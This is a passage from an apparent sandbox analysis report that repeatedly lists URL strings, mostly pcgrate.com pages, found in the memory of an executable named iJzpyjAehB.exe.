00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.naoi-a.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.266699376.0000000004180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.406391884.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olras.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296941579.0000000009100000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ora-ito.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#author
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#logo
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#organization
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#richSnippet
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#webpage
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#website
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/?s=
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/cart/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/checkout/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/comments/feed/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/feed/
                      Source: pigalicapi.exeString found in binary or memory: https://www.pcgrate.com/support/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-admin/admin-ajax.php
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1024px-Logo_Ball_Corporation.svg_-e1637155176306.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1200px-Zeiss_logosvg-e1626287816597.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 